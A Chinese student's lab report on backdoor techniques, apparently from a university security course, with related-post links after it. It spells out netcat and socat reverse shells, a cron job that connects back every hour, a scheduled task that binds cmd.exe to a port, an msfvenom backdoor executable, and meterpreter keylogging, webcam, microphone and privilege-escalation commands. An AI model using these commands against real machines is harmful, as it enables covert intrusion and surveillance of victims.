实验过程

1.Win获得Linux Shell

  • windows:使用ipconfig指令查看本机ip:
  • windows:使用ncat命令打开监听:
  • Linux反弹连接win:
    输入 nc windows_IP 端口号 -e /bin/sh连接win
  • windows运行指令,如ls,查看,截图见上。

2.Linux获得Win Shell

  • linux:使用ifconfig指令查看ip:
  • linux使用命令nc -l -p 端口号监听
  • windows反弹连接linux:
  • linux下查看windows状态,见上图。

3.使用NC传输数据

  • windows下监听端口:
    输入ncat.exe -l 端口号
  • linux连接端口:
    输入nc windows_IP 端口号
  • 会话过程(可加入参数传输文件):

4.使用netcat获取主机操作Shell,cron启动

  • windows:使用命令ncat.exe -l -p 端口号打开端口监听

    -linux:使用命令man crontab指令查看相应的教程
  • linux:用命令crontab -e编辑一条定时任务,可选vim编辑器(3)
    在最后一行输入X * * * * /bin/netcat windows_IP 端口号 -e /bin/sh
    意思是在每个小时的第X分钟反向连接Windows主机的端口

  • windows:当到设置时间时,获得shell,输入指令验证

5.使用socat获取主机操作Shell, 任务计划启动

  • 下载并解压socat
  • windows:打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器
  • 在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:端口号 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到相应端口,同时把cmd.exe的stderr重定向到stdout上
  • 创建完成之后,按Windows+L快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行,设置允许通过防火墙:

  • linux:输入指令socat - tcp:windows_IP:端口号,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的相应端口,你会发现已经成功获得一个shell

6.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

  • linux:输入指令
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=linuxIP LPORT=端口号 -f exe > 文件名_backdoor.exe,生成后面程序
  • 通过NCAT将后门程序传送到windows

  • linux:在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口
  • 输入以下命令:
    use exploit/multi/handler:进入handler模式
    set payload windows/meterpreter/reverse_tcp:设置payload

    set LHOST linuxIP:设置LHOST
    set LPORT 端口号:设置LPORT
    show options:查看当前信息状态
    exploit:MSF开始监听
  • windows:打开后门程序
  • linux:此时,linux已经获得windows的shell
  • 输入其他命令进行尝试

    使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

  • 在上题环境下,使用以下命令
    record_mic // 截获音频

    webcam_snap //摄像头拍照

    webcam stream//摄像头录像
    screenshot //截屏

    keyscan_start//记录击键过程
    keyscan_dump//读取击键记录

    getuid//查看当前用户

    getsystem//进行提权
    提权出错,是不是因为win10安全等级高,还是其它?

基础问题回答

  • (1)例举你能想到的一个后门进入到你系统中的可能方式?
    我觉得可以将它通过程序自动移植到U盘,然后当U盘插入目标机时,自动复制到目标机。
  • (2)例举你知道的后门如何启动起来(win及linux)的方式?
    将后门跟正常程序捆绑在一起,等用户使用。
  • (3)Meterpreter有哪些给你映像深刻的功能?
    击键记录,它能知道你在这段时间干什么,输入了那些东西,感觉比较恐怖。
  • (4)如何发现自己有系统有没有被安装后门?
    防火墙、杀毒软件、查看开放端口等。

实验总结与体会

  • 这次实验对后门工作原理有了了解,也跟着老师的实验指导做了属于自己的后门,抓拍了几张图,观察了击键记录,这让我简单的了解了后门的工作过程,对相应的后门工具、命令有了掌握,同时,这次实验让我对以后安全使用计算机有了相当重要的认识,要去正规网站下载程序,要规范化上网,这次入门级后门尝试只是一小步,我会在以后慢慢的学习中,去学习一些更高端的后门技术,制作更隐蔽的后门程序。

20155233 《网络对抗》Exp2 后门原理与实践的更多相关文章

  1. 20155323刘威良 网络对抗 Exp2 后门原理与实践

    20155323 刘威良<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, ...

  2. 20155331 丹增旦达 网络攻防 Exp2后门原理与实践

    20155331 丹增旦达<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启 ...

  3. 20155302 Exp2 后门原理与实践

    20155302<网络对抗>后门原理与实践 实验要求 1.使用netcat获取主机操作Shell,cron启动 (0.5分) 2.使用socat获取主机操作Shell, 任务计划启动 (0 ...

  4. 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...

  5. 20155324《网络对抗》Exp2 后门原理与实践

    20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...

  6. 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...

  7. 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...

  8. 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...

  9. 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...

  10. 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...

随机推荐

  1. mac下的tcp抓包

    所需工具: 1.所需工具wireshark软件 操作步骤: 1.打开wireshark添加手机端口监测. 在控制台中输入命令:rvictl -s iPhoneDeviceId 添加成功之后,wires ...

  2. Android HandlerThread和IntentService

    HandlerThreadHandlerThread继承了Thread,它是一种可以使用Handler的Thread,它实现也很简单,就是在run中通过Looper.prepare()来创建消息队列, ...

  3. android中checkbox自定义样式

    1.首先res/drawable中定义checkbox_style.xml样式: <?xml version="1.0" encoding="utf-8" ...

  4. MySQL缓存机制详解(一)

    本文章拿来学习用||参考资料:http://www.2cto.com/database/201308/236361.html 对MySql查询缓存及SQL Server过程缓存的理解及总结   一.M ...

  5. Mac下配置Golang环境

    1.go的官网:https://golang.org/ 下载地址:https://golang.org/dl/ ps:因为windows的影响我用的apk版本的安装比较简单,后面也会介绍环境变量的配置 ...

  6. 控制台中寄宿WCF服务

    一.首先创建一个类库,用来定义WCF服务 修改服务代码定义,具体代码如下 // 注意: 使用"重构"菜单上的"重命名"命令,可以同时更改代码和配置文件中的接口名 ...

  7. 【JAVA】什么是冒泡排序?——面试加分题

    冒泡排序是一种计算机科学领域的较简单的排序算法,有心人将代码不断优化改良,本人特摘抄部分代码进行学习. 文章来自开源中国,转载自:程序员小灰.原文:漫画:什么是冒泡排序? 冒泡排序第一版 public ...

  8. JAVA JComboBox的监听事件(ActionListener、ItemListener)

    版权声明:本文为博主原创文章,未经博主允许不得转载.   目录(?)[+]   参考资料: http://263229365.iteye.com/blog/1040329 https://www.ja ...

  9. 用LinkedList

      >用LinkedList模拟栈集合MyStack >MyStack测试类   用LinkedList模拟栈集合MyStack import java.util.LinkedList; ...

  10. MySQL主从延迟如何解决?

    我们知道生产环境中经常会遇到MySQL主从延迟问题,从原理上也能看出主库的事务提交是并发模式,而从库只有一个SQL线程负责解析,所以本身上就可能存在延迟. 延迟的主要原因在于: 1.从库的配置往往没有 ...